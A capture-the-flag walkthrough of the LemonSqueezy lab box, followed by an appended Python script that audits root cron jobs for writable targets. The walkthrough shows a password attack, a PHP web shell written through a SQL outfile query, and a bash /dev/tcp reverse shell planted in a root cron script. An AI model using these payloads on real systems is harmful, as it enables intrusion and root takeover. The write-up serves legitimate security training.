
This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY.

This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy!

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s LEMONSQUEEZY: 1 from vulnhub.


We’ve got one port only: HTTP on 80.


So with a quick gobuster fishing expedition we find a couple of interesting things - in particular, WordPress and phpMyAdmin.

Running wpscan gets us two users, lemon and orange. A password attack gets an easy win:

root@kali:/opt/vulnhub/lemonsqueezy# wpscan --url -U 'lemon,orange' -P /usr/share/wordlists/rockyou.txt 
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger

Using these credentials we can log in to WordPress, but orange is not an admin. However, we can find a post called Keep this safe! which contains a password: n0t1n@w0rdl1st!.

With this, we can log in to phpMyAdmin as orange. Once there, we can grab the password hash for lemon and try to crack it with Hashcat - it doesn’t crack easily. So instead we can overwrite lemon’s hash in the database with the hash used by orange, because we know that one corresponds to ginger. Once we’ve done that we can log in to WordPress as lemon.


Normally we could run PHP code in WordPress in a few different ways: edit an existing plugin, upload a new (malicious) plugin, or edit the PHP code of an existing theme. Unfortunately, none of these work here because the temporary upload folder hasn’t been set in wp-config.php - and we can’t change that from the dashboard. What’s more, the existing plugin and theme files are all set as non-editable, which again is something we can’t change from the dashboard. Now what?


Back in phpMyAdmin, we can create a new table and then run this SQL on it:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/wp-content/uploads/test.php"

Once we’ve done that, we can visit http://lemonsqueezy/wordpress/wp-content/uploads/test.php and run commands - finally, RCE! Note that I did also set the uploads directory in wp-options in phpMyAdmin but I don’t know if this was actually necessary or not.

This one gets me a shell:


On the box

Checking the crontab shows a cronjob of interest:

www-data@lemonsqueezy:/dev/shm$ cat /etc/crontab

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate

So this sure looks like a candidate for the logrotten exploit, right? But first let’s just check the contents:

www-data@lemonsqueezy:/dev/shm$ cat /etc/logrotate.d/logrotate
cat /etc/logrotate.d/logrotate
#!/usr/bin/env python
import os
import sys
   os.system('rm -r /tmp/* ')

Ah! Shenanigans! Well it’s fine, because we can write to the file. Let’s replace the contents:

www-data@lemonsqueezy:/dev/shm$ printf '#!/bin/bash\nbash -i >& /dev/tcp/ 0>&1\n' > /etc/logrotate.d/logrotate
<.168.1.77/1235 0>&1\n' > /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/dev/shm$ cat /etc/logrotate.d/logrotate
cat /etc/logrotate.d/logrotate
bash -i >& /dev/tcp/ 0>&1

And now we wait…


root@kali:/opt/vulnhub/lemonsqueezy# nc -nvlp 1235
Ncat: Version 7.80 ( )
Ncat: Listening on :::1235
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
bash: cannot set terminal process group (23760): Inappropriate ioctl for device
bash: no job control in this shell
root@lemonsqueezy:~# cd /root/
root@lemonsqueezy:~# cat root.txt
cat root.txt
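The root cause of this privilege escalation is a root cron job that runs a file an unprivileged user can overwrite. The script below is an added audit example, not part of the write-up or the box: it parses /etc/crontab-style lines and flags root jobs whose absolute paths are world-writable or owned by an untrusted uid. The demo() function is a constructed scenario modelled on this box’s crontab, built in a temporary directory so it runs offline.

```python
import os
import re
import stat
import tempfile

def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style (7-field) lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                        # comment or VAR=value line
        fields = line.split(None, 6)        # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs

def audit_crontab(text, trusted_uids=(0,)):
    """Flag absolute paths in root jobs that are world-writable or owned by an untrusted uid."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in re.findall(r"(?<![\w/])/[\w./-]+", command):
            try:
                st = os.stat(path)
            except OSError:
                continue                    # not present on this host
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_uid not in trusted_uids:
                reasons.append("owned by uid %d" % st.st_uid)
            if reasons:
                findings.append({"command": command, "path": path, "reasons": reasons})
    return findings

def demo():
    """Constructed scenario modelled on the box: one safe cron.hourly dir, one writable script."""
    d = tempfile.mkdtemp()
    safe, weak = os.path.join(d, "cron.hourly"), os.path.join(d, "logrotate")
    os.mkdir(safe, 0o755)
    with open(weak, "w") as f:
        f.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
    os.chmod(weak, 0o666)                   # the misconfiguration: any user can rewrite it
    crontab = ("# m h dom mon dow user command\n17 *\t* * *\troot    cd / && run-parts --report %s\n"
               "*/2 *   * * *   root    %s\n" % (safe, weak))
    return audit_crontab(crontab, trusted_uids=(0, os.getuid()))
```

To audit a real host, pass the contents of /etc/crontab to audit_crontab() with the default trusted_uids; demo() only exercises the logic against the constructed files.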

I enjoyed this one and learned some little tricks. Nice one.